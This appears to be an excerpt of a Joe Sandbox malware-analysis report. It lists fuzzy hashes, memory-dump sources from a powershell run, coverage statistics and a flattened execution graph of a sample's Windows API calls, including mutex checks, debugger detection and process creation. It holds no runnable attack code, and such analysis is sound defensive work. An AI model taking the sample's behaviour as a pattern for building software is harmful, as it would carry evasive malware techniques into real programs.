                        • Instruction ID: 3b6104ff7a48157bec612351d1069fcf21b73349d593c95299611d158f6c8345
                        • Opcode Fuzzy Hash: 34ae80c9111cb92d3dcd173ed55277adc71a7b9584a039e9541432bbc38488ac
                        • Instruction Fuzzy Hash: 0131F622E1DE874FF7A5962818656786AD1FF51BB0B5902BAC0DDCB2D3CD0C9CA4C342
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 0000001A.00000002.472700716.00007FF816410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_26_2_7ff816410000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fc5f0a91a695ff05be30e16252b13f6526685461b7b5eb8fcb1b3adee12f95b5
                        • Instruction ID: bd2e7b5119636fd37dfd9e692bf03f2156d5cbcd4b365a0f118e8a28ef92c99b
                        • Opcode Fuzzy Hash: fc5f0a91a695ff05be30e16252b13f6526685461b7b5eb8fcb1b3adee12f95b5
                        • Instruction Fuzzy Hash: 9901847111CB084FD748EF0CE451AB6B3E0FB85360F10052DE58AC3651DA22E881CB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 0000001A.00000002.472700716.00007FF816410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_26_2_7ff816410000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cab0dfb26e6a670f3fa28cbd8badbbdb7434bd9d3552a51821cb0a99d8650ade
                        • Instruction ID: c5e577b19708b96021383400ed3c53e9a2ca82a6d38bef0a389555db8a4d5b55
                        • Opcode Fuzzy Hash: cab0dfb26e6a670f3fa28cbd8badbbdb7434bd9d3552a51821cb0a99d8650ade
                        • Instruction Fuzzy Hash: 9DF0303276CA084F9B4C9A0CF843AF573D1E789334B40016EE48BC2696E916B8828685
                        Uniqueness

                        Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 13.4%
Total number of Nodes: 1172
Total number of Limit Nodes: 11

(The graph is rendered interactively in the original report; its flat node/edge listing is not reproduced here. Root node 16303 at 7ff6935c14e0. API calls that appear on graph nodes: GetStartupInfoW, Sleep, _initterm, SetUnhandledExceptionFilter, malloc, memcpy, realloc, calloc, free, memset, VirtualProtect, VirtualQuery, GetLastError, CreateMutexW, CreateMutexA, ReleaseMutex, WaitForSingleObject, SHGetFolderPathW, wcscat, _wcsicmp, GetFileAttributesW, GetCurrentProcessId, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, DuplicateHandle, GetThreadPriority, FindAtomA, AddAtomA, GetAtomNameA, _onexit, CloseHandle, FormatMessageA, IsDebuggerPresent, OutputDebugStringA, LocalFree, CreateEventA, SetEvent, CreateSemaphoreA, InitializeCriticalSection, EnterCriticalSection, TryEnterCriticalSection, LeaveCriticalSection, QueryPerformanceFrequency, QueryPerformanceCounter, GetTickCount, TlsGetValue, TlsSetValue, _ultoa, abort.)
16786->16778 16788 7ff6935d1390 16787->16788 16789 7ff6935d126c 16787->16789 16790 7ff6935d6420 17 API calls 16788->16790 16792 7ff6935cf8a0 11 API calls 16789->16792 16791 7ff6935d1395 16790->16791 16791->16789 16794 7ff6935d6420 17 API calls 16791->16794 16793 7ff6935d1287 16792->16793 16795 7ff6935d128f 16793->16795 16796 7ff6935d6420 17 API calls 16793->16796 16794->16789 16797 7ff6935d129a 16795->16797 16800 7ff6935d1305 16796->16800 16798 7ff6935d12b0 16797->16798 16799 7ff6935d132c calloc 16797->16799 16838 7ff6935d0770 16798->16838 16802 7ff6935d1343 16799->16802 16803 7ff6935d1354 16799->16803 16800->16797 16806 7ff6935d1314 16800->16806 16805 7ff6935d0770 20 API calls 16802->16805 16808 7ff6935d6420 17 API calls 16803->16808 16821 7ff6935d136a 16803->16821 16807 7ff6935d134b 16805->16807 16809 7ff6935d6420 17 API calls 16806->16809 16807->16803 16811 7ff6935d14f0 free 16807->16811 16808->16821 16809->16797 16810 7ff6935d12d8 16819 7ff6935d12e3 16810->16819 16811->16803 16812 7ff6935cfbc0 3 API calls 16817 7ff6935d12ec 16812->16817 16813 7ff6935d1380 16818 7ff6935d6420 17 API calls 16813->16818 16814 7ff6935d6420 17 API calls 16814->16821 16815 7ff6935d6420 17 API calls 16816 7ff6935d1425 16815->16816 16820 7ff6935d13c5 16816->16820 16822 7ff6935d12cc 16816->16822 16824 7ff6935d6420 17 API calls 16816->16824 16817->16764 16817->16770 16818->16819 16819->16812 16820->16822 16823 7ff6935d6420 17 API calls 16820->16823 16821->16810 16821->16813 16821->16819 16822->16810 16822->16814 16825 7ff6935d14ba 16823->16825 16824->16820 16825->16822 16826 7ff6935d6420 17 API calls 16825->16826 16826->16822 16866 7ff6935d02c0 16827->16866 16829 7ff6935d1722 16830 7ff6935cf8a0 11 API calls 16829->16830 16831 7ff6935d1731 16830->16831 16834 7ff6935d173c 16831->16834 16888 7ff6935d1520 16831->16888 16833 7ff6935cfbc0 3 API calls 16833->16834 16834->16833 16836 7ff6935d16ad OutputDebugStringA abort 16835->16836 16839 7ff6935d078a 16838->16839 16862 7ff6935d0cb1 16838->16862 
16840 7ff6935d6420 17 API calls 16839->16840 16865 7ff6935d079d 16839->16865 16841 7ff6935d0fcc 16840->16841 16842 7ff6935d6420 17 API calls 16841->16842 16841->16865 16843 7ff6935d0fe8 16842->16843 16845 7ff6935d6420 17 API calls 16843->16845 16843->16865 16844 7ff6935d0df1 malloc 16844->16862 16844->16865 16846 7ff6935d1000 16845->16846 16848 7ff6935d6420 17 API calls 16846->16848 16846->16865 16847 7ff6935d0d30 realloc 16847->16862 16847->16865 16849 7ff6935d101c 16848->16849 16851 7ff6935d6420 17 API calls 16849->16851 16849->16865 16850 7ff6935cff20 17 API calls 16850->16865 16852 7ff6935d103a 16851->16852 16853 7ff6935d6420 17 API calls 16852->16853 16852->16865 16854 7ff6935d1056 16853->16854 16854->16844 16855 7ff6935d6420 17 API calls 16854->16855 16854->16865 16856 7ff6935d1075 16855->16856 16857 7ff6935d6420 17 API calls 16856->16857 16856->16862 16856->16865 16858 7ff6935d1091 16857->16858 16860 7ff6935d6420 17 API calls 16858->16860 16858->16865 16859 7ff6935d6420 17 API calls 16859->16865 16861 7ff6935d10b1 16860->16861 16861->16847 16863 7ff6935d6420 17 API calls 16861->16863 16861->16865 16862->16815 16862->16820 16862->16822 16863->16865 16864 7ff6935d0c0f memcpy 16864->16865 16865->16844 16865->16847 16865->16850 16865->16859 16865->16862 16865->16864 16867 7ff6935d03f0 16866->16867 16870 7ff6935d02de 16866->16870 16868 7ff6935d6420 17 API calls 16867->16868 16869 7ff6935d03f5 16868->16869 16869->16870 16872 7ff6935d6420 17 API calls 16869->16872 16871 7ff6935d030b 16870->16871 16873 7ff6935d6420 17 API calls 16870->16873 16875 7ff6935d0332 calloc 16871->16875 16884 7ff6935d0340 16871->16884 16872->16870 16874 7ff6935d03c5 16873->16874 16874->16871 16877 7ff6935d6420 17 API calls 16874->16877 16878 7ff6935d0494 16875->16878 16879 7ff6935d047e 16875->16879 16877->16871 16881 7ff6935d6420 17 API calls 16878->16881 16879->16884 16880 7ff6935d0365 16885 7ff6935d6420 17 API calls 16880->16885 16886 7ff6935d036f 16880->16886 16883 7ff6935d0499 
16881->16883 16882 7ff6935d6420 17 API calls 16882->16880 16883->16879 16887 7ff6935d6420 17 API calls 16883->16887 16884->16880 16884->16882 16885->16886 16886->16829 16887->16879 16889 7ff6935d1535 TlsAlloc 16888->16889 16890 7ff6935d15b0 16888->16890 16894 7ff6935d1580 16889->16894 16895 7ff6935d155b 16889->16895 16891 7ff6935d6420 17 API calls 16890->16891 16893 7ff6935d15b5 16891->16893 16893->16889 16897 7ff6935d6420 17 API calls 16893->16897 16896 7ff6935d6420 17 API calls 16894->16896 16898 7ff6935f1b20 abort 16895->16898 16899 7ff6935d1579 16895->16899 16900 7ff6935d1585 16896->16900 16897->16889 16901 7ff6935f1b26 abort 16898->16901 16899->16834 16900->16895 16902 7ff6935d6420 17 API calls 16900->16902 16903 7ff6935f1b2c 16901->16903 16902->16895 16903->16903 16905 7ff6935d7c72 16904->16905 16906 7ff6935d7cb0 LeaveCriticalSection 16904->16906 16907 7ff6935d7c90 LeaveCriticalSection 16905->16907 16908 7ff6935d7c79 ReleaseSemaphore 16905->16908 16906->16672 16907->16672 16908->16907 16909 7ff6935d7cd0 LeaveCriticalSection 16908->16909 16909->16672 16910->16672 16912 7ff6935d8531 16911->16912 16913 7ff6935d8548 16911->16913 16912->16672 16930 7ff6935d81d0 16913->16930 16916 7ff6935d8563 LeaveCriticalSection 16916->16912 16917 7ff6935d8570 16917->16916 16919 7ff6935d8170 16918->16919 16923 7ff6935d80cf 16918->16923 16920 7ff6935d6420 17 API calls 16919->16920 16921 7ff6935d8175 16920->16921 16921->16923 16924 7ff6935d6420 17 API calls 16921->16924 16922 7ff6935d8107 16926 7ff6935d6420 17 API calls 16922->16926 16928 7ff6935d810f 16922->16928 16923->16922 16925 7ff6935d7f60 9 API calls 16923->16925 16924->16923 16925->16922 16927 7ff6935d8145 16926->16927 16927->16928 16929 7ff6935d6420 17 API calls 16927->16929 16928->16683 16929->16928 16931 7ff6935d8250 16930->16931 16932 7ff6935d81e8 16930->16932 16933 7ff6935d6880 5 API calls 16931->16933 16967 7ff6935d47e0 16932->16967 16935 7ff6935d8258 16933->16935 16937 7ff6935d841d WaitForSingleObject 16935->16937 
16962 7ff6935d826e EnterCriticalSection 16935->16962 16937->16962 16965 7ff6935d8326 16937->16965 16938 7ff6935d82e0 16944 7ff6935d8338 16938->16944 16958 7ff6935d82eb 16938->16958 16940 7ff6935d6880 5 API calls 16940->16944 16941 7ff6935d6880 5 API calls 16941->16958 16942 7ff6935d8298 16948 7ff6935d82ba 16942->16948 16949 7ff6935d82a9 WaitForSingleObject 16942->16949 16943 7ff6935d83d0 16945 7ff6935d4ad0 54 API calls 16943->16945 16944->16940 16944->16943 16946 7ff6935d8360 16944->16946 16950 7ff6935d4ad0 54 API calls 16944->16950 16956 7ff6935d836d 16944->16956 16952 7ff6935d83d5 16945->16952 16957 7ff6935d4ad0 54 API calls 16946->16957 16946->16962 16947 7ff6935d8314 16964 7ff6935d4ad0 54 API calls 16947->16964 16947->16965 16948->16962 17019 7ff6935d4ad0 16948->17019 16949->16948 16949->16962 16950->16944 16951 7ff6935d8232 ResetEvent 16955 7ff6935d8205 16951->16955 16951->16956 16952->16956 16960 7ff6935d83dd WaitForSingleObject 16952->16960 16953 7ff6935d4ad0 54 API calls 16953->16958 16954 7ff6935d83a9 WaitForSingleObject 16954->16962 16954->16965 16955->16942 16955->16948 16955->16951 16955->16962 16955->16965 16970 7ff6935d6920 16955->16970 16978 7ff6935d4ca0 16955->16978 16956->16962 16963 7ff6935d4ca0 88 API calls 16956->16963 16957->16956 16958->16941 16958->16947 16958->16953 16958->16954 16958->16962 16958->16965 16960->16962 16962->16916 16962->16917 16963->16962 16964->16965 16965->16962 16966 7ff6935d4ca0 88 API calls 16965->16966 16966->16962 16968 7ff6935d2100 54 API calls 16967->16968 16969 7ff6935d47e9 16968->16969 16969->16938 16969->16955 16971 7ff6935d69b8 WaitForMultipleObjects 16970->16971 16972 7ff6935d6949 16970->16972 16974 7ff6935d69a0 16971->16974 16973 7ff6935d66d0 3 API calls 16972->16973 16977 7ff6935d695e 16973->16977 16974->16955 16975 7ff6935d698b WaitForMultipleObjects 16975->16974 16975->16977 16976 7ff6935d66d0 3 API calls 16976->16977 16977->16974 16977->16975 16977->16976 16979 7ff6935d2100 54 API calls 16978->16979 16980 
7ff6935d4cad 16979->16980 16981 7ff6935d4cca 16980->16981 16982 7ff6935d6420 17 API calls 16980->16982 16986 7ff6935d4d00 16980->16986 16984 7ff6935cf8a0 11 API calls 16981->16984 16981->16986 16983 7ff6935d4d25 16982->16983 16983->16981 16985 7ff6935d6420 17 API calls 16983->16985 16987 7ff6935d4ce9 16984->16987 16985->16981 16986->16955 16987->16986 16988 7ff6935d4d64 ResetEvent 16987->16988 16989 7ff6935d4d6a 16987->16989 16988->16989 16990 7ff6935cfbc0 3 API calls 16989->16990 16991 7ff6935d4d72 16990->16991 17027 7ff6935d4ba0 16991->17027 17020 7ff6935d4b20 17019->17020 17023 7ff6935d4ae4 17019->17023 17021 7ff6935d6420 17 API calls 17020->17021 17022 7ff6935d4b25 17021->17022 17022->17023 17026 7ff6935d6420 17 API calls 17022->17026 17024 7ff6935d4b04 17023->17024 17025 7ff6935d2100 54 API calls 17023->17025 17024->16962 17025->17024 17026->17023 17028 7ff6935d2100 54 API calls 17027->17028 17029 7ff6935d4bab 17028->17029 17030 7ff6935d4b60 54 API calls 17029->17030 17032 7ff6935d4bc5 17030->17032 17031 7ff6935d6420 17 API calls 17031->17032 17032->17031 17033 7ff6935d4b60 54 API calls 17032->17033 17034 7ff6935d4920 93 API calls 17032->17034 17033->17032 17034->17032 17036 7ff6935d6be0 17035->17036 17040 7ff6935d6b5e 17035->17040 17037 7ff6935d6420 17 API calls 17036->17037 17038 7ff6935d6be5 17037->17038 17039 7ff6935d6420 17 API calls 17038->17039 17038->17040 17039->17040 17041 7ff6935d6420 17 API calls 17040->17041 17043 7ff6935d6bb9 17040->17043 17042 7ff6935d6c2d 17041->17042 17042->17043 17044 7ff6935d6420 17 API calls 17042->17044 17043->16606 17044->17043 17046 7ff6935d87e0 17045->17046 17047 7ff6935d8803 17045->17047 17046->17047 17048 7ff6935d8810 EnterCriticalSection 17046->17048 17047->16614 17049 7ff6935d8824 17048->17049 17050 7ff6935d8878 17048->17050 17051 7ff6935d8900 LeaveCriticalSection 17049->17051 17056 7ff6935d882f LeaveCriticalSection 17049->17056 17052 7ff6935d88e0 LeaveCriticalSection 17050->17052 17054 7ff6935d84e0 89 API calls 
17050->17054 17051->17047 17052->17047 17055 7ff6935d88a7 17054->17055 17055->17052 17055->17056 17056->17047 17058 7ff6935c1630 17057->17058 17067 7ff6935c2a5a 17057->17067 17069 7ff6935cf5f0 17058->17069 17059 7ff6935c2bfe _stricmp 17059->17067 17060 7ff6935c2b14 _stricmp 17060->17067 17061 7ff6935cf5f0 74 API calls 17061->17067 17062 7ff6935c2e08 strcmp 17062->17067 17063 7ff6935c2eba strcmp 17063->17067 17064 7ff6935c2f61 strcmp 17064->17067 17065 7ff6935c3011 strcmp 17065->17067 17066 7ff6935c30b4 strcmp 17066->17067 17067->17058 17067->17059 17067->17060 17067->17061 17067->17062 17067->17063 17067->17064 17067->17065 17067->17066 17067->17067 17068 7ff6935c3134 strcmp 17067->17068 17068->17067 17070 7ff6935cf606 17069->17070 17071 7ff6935cf648 17069->17071 17185 7ff6935d4620 GetLastError 17070->17185 17163 7ff6935d32c0 17071->17163 17074 7ff6935cf611 17076 7ff6935cf688 calloc 17074->17076 17077 7ff6935cf619 17074->17077 17075 7ff6935cf65b 17078 7ff6935cf8a0 11 API calls 17075->17078 17082 7ff6935cf7ea abort 17076->17082 17083 7ff6935cf6a6 17076->17083 17079 7ff6935cf625 17077->17079 17080 7ff6935cf730 realloc 17077->17080 17081 7ff6935cf667 17078->17081 17084 7ff6935cf6bb 17079->17084 17085 7ff6935cf637 17079->17085 17080->17082 17086 7ff6935cf75b memset 17080->17086 17087 7ff6935cf7b8 17081->17087 17092 7ff6935cfbc0 3 API calls 17081->17092 17095 7ff6935cf7f5 17082->17095 17189 7ff6935d4690 GetLastError 17083->17189 17084->17085 17089 7ff6935cf790 malloc 17084->17089 17090 7ff6935cf6e1 malloc 17084->17090 17085->16354 17091 7ff6935d4690 59 API calls 17086->17091 17093 7ff6935cf7d8 memset 17087->17093 17089->17082 17094 7ff6935cf6f3 17089->17094 17090->17082 17090->17094 17096 7ff6935cf783 17091->17096 17092->17070 17097 7ff6935cf715 17093->17097 17094->17093 17099 7ff6935cf70a memcpy 17094->17099 17095->16354 17096->17089 17097->16354 17099->17097 17101 7ff6935cf5f0 74 API calls 17100->17101 17102 7ff6935c2296 17101->17102 17103 7ff6935cf5f0 74 API calls 
17102->17103 17104 7ff6935c22a5 17103->17104 17105 7ff6935cf5f0 74 API calls 17104->17105 17106 7ff6935c23c0 17105->17106 17107 7ff6935cf5f0 74 API calls 17106->17107 17108 7ff6935c23cf 17107->17108 17108->17108 17212 7ff6935c2120 17108->17212 17110 7ff6935c24d3 17111 7ff6935c3c40 141 API calls 17110->17111 17112 7ff6935c24e0 17111->17112 17113 7ff6935c2501 wcslen 17112->17113 17131 7ff6935c24f2 17112->17131 17114 7ff6935c2531 17113->17114 17115 7ff6935c265d 17113->17115 17117 7ff6935c2548 memcpy 17114->17117 17118 7ff6935c255d 17114->17118 17129 7ff6935c262a 17114->17129 17218 7ff6935ef1e0 17115->17218 17117->17118 17119 7ff6935cf5f0 74 API calls 17118->17119 17120 7ff6935c2596 17119->17120 17122 7ff6935cf5f0 74 API calls 17120->17122 17121 7ff6935cf5f0 74 API calls 17123 7ff6935c26bd 17121->17123 17124 7ff6935c25a5 17122->17124 17125 7ff6935cf5f0 74 API calls 17123->17125 17127 7ff6935c2611 wcslen 17124->17127 17126 7ff6935c26cc 17125->17126 17128 7ff6935c2737 wcslen 17126->17128 17127->17129 17130 7ff6935c2750 17128->17130 17129->17121 17129->17131 17130->17131 17132 7ff6935cf5f0 74 API calls 17130->17132 17131->16369 17133 7ff6935c2766 17132->17133 17134 7ff6935cf5f0 74 API calls 17133->17134 17135 7ff6935c2775 17134->17135 17136 7ff6935c27ca wcslen 17135->17136 17137 7ff6935c27e3 17136->17137 17137->17131 17138 7ff6935cf5f0 74 API calls 17137->17138 17139 7ff6935c27f9 17138->17139 17140 7ff6935cf5f0 74 API calls 17139->17140 17141 7ff6935c2808 17140->17141 17142 7ff6935c285d wcslen 17141->17142 17143 7ff6935c2876 17142->17143 17143->17131 17144 7ff6935cf5f0 74 API calls 17143->17144 17145 7ff6935c28c7 17144->17145 17146 7ff6935cf5f0 74 API calls 17145->17146 17148 7ff6935c28d6 17146->17148 17147 7ff6935c2959 wcslen 17147->17131 17148->17147 17148->17148 17687 7ff6935c3250 17149->17687 17151 7ff6935c3c57 17152 7ff6935c3cf0 17151->17152 17153 7ff6935c3c64 GetFileSize GetProcessHeap HeapAlloc 17151->17153 17152->16387 17154 7ff6935c3cd4 17153->17154 17154->16387 
17156 7ff6935c29b3 CreateMutexW GetLastError 17155->17156 17157 7ff6935c29e3 17155->17157 17156->17157 17157->16391 17737 7ff6935c3880 wcslen 17158->17737 17162 7ff6935c3d3e 17162->16391 17164 7ff6935d32dc 17163->17164 17168 7ff6935d33d8 17163->17168 17165 7ff6935d3328 17164->17165 17166 7ff6935d02c0 18 API calls 17164->17166 17165->17075 17167 7ff6935d32e6 17166->17167 17169 7ff6935cf8a0 11 API calls 17167->17169 17168->17075 17170 7ff6935d32f5 17169->17170 17171 7ff6935d3340 17170->17171 17172 7ff6935d32fb 17170->17172 17173 7ff6935d2100 54 API calls 17171->17173 17177 7ff6935d33bb fprintf 17172->17177 17184 7ff6935d3304 17172->17184 17175 7ff6935d3356 17173->17175 17174 7ff6935cfbc0 3 API calls 17176 7ff6935d330c 17174->17176 17175->17168 17178 7ff6935d2100 54 API calls 17175->17178 17199 7ff6935d04d0 17176->17199 17177->17184 17180 7ff6935d3370 17178->17180 17180->17168 17182 7ff6935d2100 54 API calls 17180->17182 17183 7ff6935d338c 17182->17183 17183->17168 17183->17184 17184->17174 17186 7ff6935d2100 54 API calls 17185->17186 17187 7ff6935d463f 17186->17187 17188 7ff6935d466d SetLastError 17187->17188 17188->17074 17190 7ff6935d2100 54 API calls 17189->17190 17191 7ff6935d46b3 17190->17191 17192 7ff6935d4700 realloc 17191->17192 17193 7ff6935d46c7 17191->17193 17194 7ff6935d4720 realloc 17192->17194 17197 7ff6935d46ea 17192->17197 17195 7ff6935d46df SetLastError 17193->17195 17196 7ff6935d4734 17194->17196 17194->17197 17195->17197 17198 7ff6935d474c memset 17196->17198 17197->17084 17198->17193 17200 7ff6935d06d0 17199->17200 17203 7ff6935d04e4 17199->17203 17200->17075 17201 7ff6935d0708 17204 7ff6935d6420 17 API calls 17201->17204 17202 7ff6935d06e0 fprintf 17202->17201 17203->17201 17203->17202 17206 7ff6935d0659 17203->17206 17209 7ff6935d6420 17 API calls 17203->17209 17210 7ff6935d0682 17204->17210 17208 7ff6935cfd90 2 API calls 17206->17208 17207 7ff6935d6420 17 API calls 17207->17210 17208->17210 17209->17203 17210->17207 17211 7ff6935d0690 free 
17210->17211 17211->17210 17222 7ff6935cea40 17212->17222 17214 7ff6935c212f memset 17224 7ff6935d95c0 17214->17224 17216 7ff6935c2184 CreateProcessInternalW 17217 7ff6935c2226 17216->17217 17217->17110 17221 7ff6935ef1f6 17218->17221 17256 7ff6935f17c0 17221->17256 17223 7ff6935cea4f 17222->17223 17223->17214 17223->17223 17225 7ff6935d95cf 17224->17225 17226 7ff6935d9610 17224->17226 17231 7ff6935dd850 17225->17231 17228 7ff6935dd850 5 API calls 17226->17228 17230 7ff6935d9625 17228->17230 17230->17216 17232 7ff6935dd87b 17231->17232 17233 7ff6935dd968 17232->17233 17235 7ff6935dd926 17232->17235 17239 7ff6935d95e8 17232->17239 17234 7ff6935dc0d0 5 API calls 17233->17234 17238 7ff6935dd98c 17233->17238 17234->17238 17235->17239 17240 7ff6935dc0d0 17235->17240 17237 7ff6935dc0d0 5 API calls 17237->17238 17238->17237 17238->17239 17239->17216 17241 7ff6935dc0e7 17240->17241 17242 7ff6935dc200 17241->17242 17243 7ff6935dc107 17241->17243 17244 7ff6935dc117 17242->17244 17245 7ff6935dc215 fwprintf 17242->17245 17246 7ff6935dc266 fwprintf 17242->17246 17251 7ff6935dc10c 17243->17251 17252 7ff6935dbc40 17243->17252 17244->17239 17245->17244 17246->17244 17248 7ff6935dc1b0 17248->17244 17249 7ff6935dc1ec fputwc 17248->17249 17249->17248 17250 7ff6935dc163 fputwc 17250->17251 17251->17244 17251->17248 17251->17250 17253 7ff6935dbc50 17252->17253 17254 7ff6935dbc60 17253->17254 17255 7ff6935dbc80 fputwc 17253->17255 17254->17243 17255->17243 17319 7ff6935f0cd0 malloc 17256->17319 17320 7ff6935f0ceb 17319->17320 17321 7ff6935f0d28 17319->17321 17326 7ff6935e9440 17320->17326 17348 7ff6935e2090 17321->17348 17327 7ff6935e9474 17326->17327 17328 7ff6935e9468 strlen 17326->17328 17500 7ff6935e5ec0 17327->17500 17328->17327 17331 7ff6935f1490 17636 7ff6935f1070 17331->17636 17337 7ff6935f14cb 17338 7ff6935f0620 124 API calls 17337->17338 17339 7ff6935f14d8 17338->17339 17671 7ff6935cf000 17339->17671 17342 7ff6935f1020 17343 7ff6935f1050 17342->17343 17344 7ff6935f1037 
17342->17344 17344->17343 17345 7ff6935e1f40 124 API calls 17344->17345 17346 7ff6935f1048 17345->17346 17347 7ff6935cf280 RtlCaptureContext RtlUnwindEx abort 17346->17347 17349 7ff6935cf8a0 11 API calls 17348->17349 17350 7ff6935e20a5 17349->17350 17351 7ff6935e2146 17350->17351 17356 7ff6935e20ad 17350->17356 17389 7ff6935e28c0 17351->17389 17353 7ff6935cfbc0 3 API calls 17354 7ff6935e211c 17353->17354 17355 7ff6935f0cd0 124 API calls 17354->17355 17357 7ff6935e2120 17354->17357 17358 7ff6935e2155 17355->17358 17356->17353 17356->17354 17357->17320 17365 7ff6935f0620 17357->17365 17359 7ff6935f1490 124 API calls 17358->17359 17360 7ff6935e2175 17359->17360 17361 7ff6935e2183 17360->17361 17396 7ff6935f0e00 17360->17396 17411 7ff6935cf280 RtlCaptureContext RtlUnwindEx abort 17361->17411 17416 7ff6935f0350 17365->17416 17367 7ff6935f0629 17422 7ff6935e17a0 17367->17422 17390 7ff6935f0cd0 123 API calls 17389->17390 17391 7ff6935e28ce 17390->17391 17392 7ff6935f1490 123 API calls 17391->17392 17393 7ff6935e28ee 17392->17393 17394 7ff6935e2910 17393->17394 17395 7ff6935e2900 free 17393->17395 17394->17354 17395->17394 17397 7ff6935f0e14 17396->17397 17412 7ff6935e17e0 17397->17412 17413 7ff6935e17e6 17412->17413 17414 7ff6935f0620 124 API calls 17413->17414 17415 7ff6935e17eb 17414->17415 17417 7ff6935f0380 17416->17417 17418 7ff6935f0364 17416->17418 17432 7ff6935cec00 GetCurrentProcessId 17417->17432 17418->17367 17420 7ff6935f0385 17420->17418 17421 7ff6935cec00 17 API calls 17420->17421 17421->17418 17423 7ff6935e17a9 abort 17422->17423 17424 7ff6935f0d40 17423->17424 17425 7ff6935e17b6 abort 17424->17425 17456 7ff6935f0f50 17425->17456 17427 7ff6935e17c6 17428 7ff6935e17d4 17427->17428 17429 7ff6935f0e00 122 API calls 17427->17429 17465 7ff6935cf280 RtlCaptureContext RtlUnwindEx abort 17428->17465 17429->17428 17433 7ff6935cec23 CreateMutexA WaitForSingleObject 17432->17433 17435 7ff6935cee76 17433->17435 17436 7ff6935ced36 FindAtomA 17433->17436 17437 
7ff6935cea80 6 API calls 17435->17437 17438 7ff6935cedc1 GetAtomNameA 17436->17438 17439 7ff6935ced48 AddAtomA 17436->17439 17440 7ff6935cee82 CloseHandle 17437->17440 17441 7ff6935cee96 17438->17441 17449 7ff6935cedf9 17438->17449 17444 7ff6935cee63 17439->17444 17445 7ff6935ced8c _onexit 17439->17445 17440->17420 17442 7ff6935cea80 6 API calls 17441->17442 17442->17449 17451 7ff6935cea80 GetLastError 17444->17451 17446 7ff6935ced9f ReleaseMutex CloseHandle 17445->17446 17448 7ff6935cedb8 17446->17448 17448->17420 17449->17446 17450 7ff6935cee4e _onexit 17449->17450 17450->17446 17452 7ff6935cea94 17451->17452 17453 7ff6935ceaa0 FormatMessageA 17451->17453 17452->17448 17454 7ff6935cead5 IsDebuggerPresent 17453->17454 17455 7ff6935ceae8 OutputDebugStringA OutputDebugStringA LocalFree 17453->17455 17454->17452 17455->17454 17466 7ff6935f1270 17456->17466 17458 7ff6935f0f86 17458->17427 17459 7ff6935f0f59 17459->17458 17460 7ff6935f0620 124 API calls 17459->17460 17461 7ff6935f0fd1 17460->17461 17462 7ff6935f1010 17461->17462 17485 7ff6935e1f40 17461->17485 17467 7ff6935f1320 17466->17467 17468 7ff6935f1288 17466->17468 17469 7ff6935cec00 17 API calls 17467->17469 17472 7ff6935f129c 17468->17472 17473 7ff6935f12c0 17468->17473 17471 7ff6935f1325 17469->17471 17470 7ff6935f12a5 17470->17459 17471->17468 17471->17473 17477 7ff6935cec00 17 API calls 17471->17477 17472->17470 17474 7ff6935cec00 17 API calls 17472->17474 17473->17470 17475 7ff6935d4620 56 API calls 17473->17475 17476 7ff6935f137d 17474->17476 17478 7ff6935f12d2 17475->17478 17476->17470 17481 7ff6935cec00 17 API calls 17476->17481 17479 7ff6935f133d 17477->17479 17478->17459 17479->17472 17480 7ff6935f1347 17479->17480 17480->17473 17482 7ff6935cec00 17 API calls 17480->17482 17481->17470 17483 7ff6935f1358 17482->17483 17483->17473 17484 7ff6935cec00 17 API calls 17483->17484 17484->17473 17486 7ff6935cf8a0 11 API calls 17485->17486 17490 7ff6935e1f54 17486->17490 17487 7ff6935e205a 17489 7ff6935e28c0 
124 API calls 17487->17489 17488 7ff6935e1f83 17492 7ff6935cfbc0 malloc GetCurrentThreadId SetEvent 17488->17492 17491 7ff6935e1fff 17489->17491 17490->17487 17490->17488 17493 7ff6935f0cd0 124 API calls 17491->17493 17496 7ff6935e2003 17491->17496 17492->17491 17494 7ff6935e2069 17493->17494 17495 7ff6935f1490 124 API calls 17494->17495 17497 7ff6935e2089 17495->17497 17496->17427 17498 7ff6935cf280 RtlCaptureContext RtlUnwindEx abort 17497->17498 17499 7ff6935e208e 17498->17499 17501 7ff6935e5ed3 17500->17501 17502 7ff6935e5ed8 17500->17502 17501->17502 17503 7ff6935e5f3a 17501->17503 17510 7ff6935e6400 17502->17510 17522 7ff6935f16d0 17503->17522 17506 7ff6935e5ee5 17508 7ff6935e5ef7 17506->17508 17509 7ff6935e5f18 memcpy 17506->17509 17508->17331 17509->17508 17511 7ff6935e648e 17510->17511 17512 7ff6935e6417 17510->17512 17513 7ff6935f17c0 124 API calls 17511->17513 17515 7ff6935e6489 17512->17515 17516 7ff6935e6439 17512->17516 17519 7ff6935e649a 17513->17519 17575 7ff6935f1610 17515->17575 17553 7ff6935f0bf0 17516->17553 17517 7ff6935e6469 17517->17506 17520 7ff6935e64bb 17519->17520 17618 7ff6935e78b0 17519->17618 17520->17506 17523 7ff6935f0cd0 124 API calls 17522->17523 17524 7ff6935f16e5 17523->17524 17525 7ff6935e89b0 124 API calls 17524->17525 17526 7ff6935f16f3 17525->17526 17527 7ff6935f1490 124 API calls 17526->17527 17528 7ff6935f1709 17527->17528 17529 7ff6935f1020 124 API calls 17528->17529 17530 7ff6935f1714 17529->17530 17635 7ff6935cf280 RtlCaptureContext RtlUnwindEx abort 17530->17635 17554 7ff6935f0c01 malloc 17553->17554 17555 7ff6935f0c0e 17554->17555 17557 7ff6935f0c14 17554->17557 17555->17517 17556 7ff6935f0c22 17558 7ff6935f0cd0 121 API calls 17556->17558 17557->17554 17557->17556 17559 7ff6935f0c2c 17558->17559 17560 7ff6935f1490 121 API calls 17559->17560 17561 7ff6935f0c50 malloc 17560->17561 17562 7ff6935f0cae 17561->17562 17563 7ff6935f0c77 17561->17563 17564 7ff6935e2090 121 API calls 17562->17564 17563->17517 17565 7ff6935f0cb8 
